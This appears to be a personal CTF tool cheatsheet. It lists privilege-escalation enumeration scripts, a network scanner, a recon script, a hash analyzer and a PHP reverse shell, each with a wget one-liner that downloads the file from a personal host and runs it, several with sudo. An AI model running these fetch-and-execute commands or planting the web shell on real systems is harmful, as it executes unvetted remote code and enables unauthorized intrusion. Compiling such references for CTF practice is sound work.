My most used tools for CTF.
Cheatsheets for all kind of tools.
Linpeas is an automated tool for Linux enumaration.
wget "https://tools.ntaheij.dev/linpeas.sh" -O linpeas.sh; chmod 700 linpeas.sh; ./linpeas.shWinpeas is an automated tool for Windows enumaration.
Linenum is an automated tool for Linux enumaration.
wget "https://tools.ntaheij.dev/linenum.sh" -O linenum.sh; chmod 700 linenum.sh; ./linenum.shLinux Smart Enumaration is an automated tool for Linux enumaration.
wget "https://tools.ntaheij.dev/lse.sh" -O lse.sh; chmod 700 lse.sh; ./lse.shB375K is a multi-purpose php reverse shell.
wget "https://tools.ntaheij.dev/b375k.php" -O b375k.phpScanner is a tool to scan your network for computers with open ports.
wget "https://tools.ntaheij.dev/scanner.py" -O scanner.py; chmod 700 scanner.py; ./scanner.pySumRecon is a tool for web recon.
wget "https://tools.ntaheij.dev/sumrecon.sh" -O sumrecon.sh; chmod 700 sumrecon.sh; sudo ./sumrecon.shHashalyzer is a tool for analyzing hashes.
wget "https://tools.ntaheij.dev/hashalyzer" -O hashalyzer; chmod 700 hashalyzer; sudo ./hashalyzer